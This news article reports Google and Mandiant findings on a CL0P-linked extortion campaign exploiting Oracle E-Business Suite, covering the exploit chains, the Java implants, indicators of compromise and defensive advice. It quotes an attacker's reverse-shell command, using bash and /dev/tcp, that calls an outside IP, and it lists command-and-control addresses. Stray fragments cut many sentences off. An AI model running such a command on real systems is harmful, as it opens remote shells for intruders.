Google reports 'mass amounts of customer data' exploited in extortion campaign

Google has reported a large-scale extraction of customer data by bad actors, who it claimed are involved in an extortion ￰0￱ Threat Intelligence and Mandiant tracked the exploitation operation to attackers that might be associated with the CL0P extortion group. Google’s Threat Intelligence Group (GTIG) and Mandiant have brought an extensive extortion campaign that exploits the vulnerabilities in Oracle’s E-Business Suite (EBS) to ￰1￱ extortion campaign has resulted in the theft of large volumes of customer ￰2￱ said the operation began on September 29, 2025 and involved a group claiming ties to the CL0P extortion ￰3￱ and Mandiant reveal zero-day exploitation According to Google’s report, the attackers sent a “high volume” of emails to executives across multiple organizations, alleging breaches of their Oracle EBS environments and threatening to publish stolen data unless a ransom was ￰4￱ emails, sent from hundreds of compromised third-party accounts, included contact addresses, support@pubstorm.

com and support@pubstorm. net , previously linked to the CL0P data leak ￰5￱ and Mandiant’s joint investigation found that the exploitation activity dates back to as early as July 2025, possibly linked to a zero-day vulnerability now tracked as ￰6￱ some cases, the attackers reportedly exfiltrated “a significant amount of data” from affected ￰7￱ stated that the exploited flaws had been fixed in July, but later issued emergency updates on October 4 to address additional ￰8￱ told its customers to use the latest critical patch updates and stressed that staying current on all patches is essential to prevent ￰9￱ CL0P extortion brand has been active since 2020 and is historically tied to the FIN11 cybercrime ￰10￱ has previously targeted managed file transfer systems like MOVEit, GoAnywhere, and Accellion ￰11￱ campaigns followed a similar pattern of the mass exploitation of zero-day vulnerabilities, theft of sensitive data, and extortion weeks ￰12￱ the time of the report , no new victims from this incident had appeared on CL0P’s data leak site.

Complex, multi-stage Java implants Google and Mandiant’s technical breakdown reveals that the attackers used multiple exploit chains targeting Oracle EBS components, including UiServlet and SyncServlet, to achieve remote code execution and plant multi-stage Java ￰13￱ July 2025 there was suspicious activity that involved HTTP requests to /OA_HTML/configurator/UiServlet. This suspicious activity was observed in another exploit that later surfaced in a Telegram group named “SCATTERED LAPSUS$ HUNTERS.” The leaked exploit made use of several advanced techniques to gain control over targeted servers, such as a server-side request forgery (SSRF), an authentication bypass, and a XSL template ￰14￱ August 2025, the attackers began using another tool called SyncServlet to make and run harmful templates inside the EBS ￰15￱ templates contained Base64-encoded XSL payloads that loaded Java-based malware directly into ￰16￱ the identified implants were GOLDVEIN.

JAVA, a downloader that retrieved second-stage payloads from attacker-controlled command servers, and a multi-layered chain dubbed SAGE, which installed persistent Java servlet filters for further ￰17￱ breaching the system, the attackers used the EBS account “applmgr” to explore the system, collect network and system details, and then install more malicious ￰18￱ attackers also used shell commands such as ip addr, netstat -an, and bash -i >& /dev/tcp/200.107.207.26/53 0>&1. The IP addresses 200.107.207.26 and 161.97.99.49 were identified in exploitation attempts, while 162.55.17.215:443 and 104.194.11.200:443 were listed as command-and-control servers for the ￰19￱ ￰20￱ has not formally linked the operation to any known group, but the campaign shares similarities with FIN11, which is a financially motivated cybercrime group that was previously associated with CL0P ransomware and large-scale data theft ￰21￱ also noted that one of the compromised accounts used to send the extortion emails had been used in earlier FIN11-related ￰22￱ are urged to be suspicious of EBS database tables XDO_TEMPLATES_B and XDO_LOBS, especially those with names beginning with “TMP” or “DEF”, and to block external internet traffic from EBS servers to prevent more data ￰23￱ organizations also recommend close monitoring of HTTP requests to endpoints like /OA_HTML/SyncServlet and /OA_HTML/configurator/UiServlet, and analyzing memory dumps for evidence of in-memory Java ￰24￱ warned that CL0P-linked groups will almost certainly continue to dedicate their resources to acquiring zero-day ￰25￱ seen where it ￰26￱ in Cryptopolitan Research and reach crypto’s sharpest investors and builders.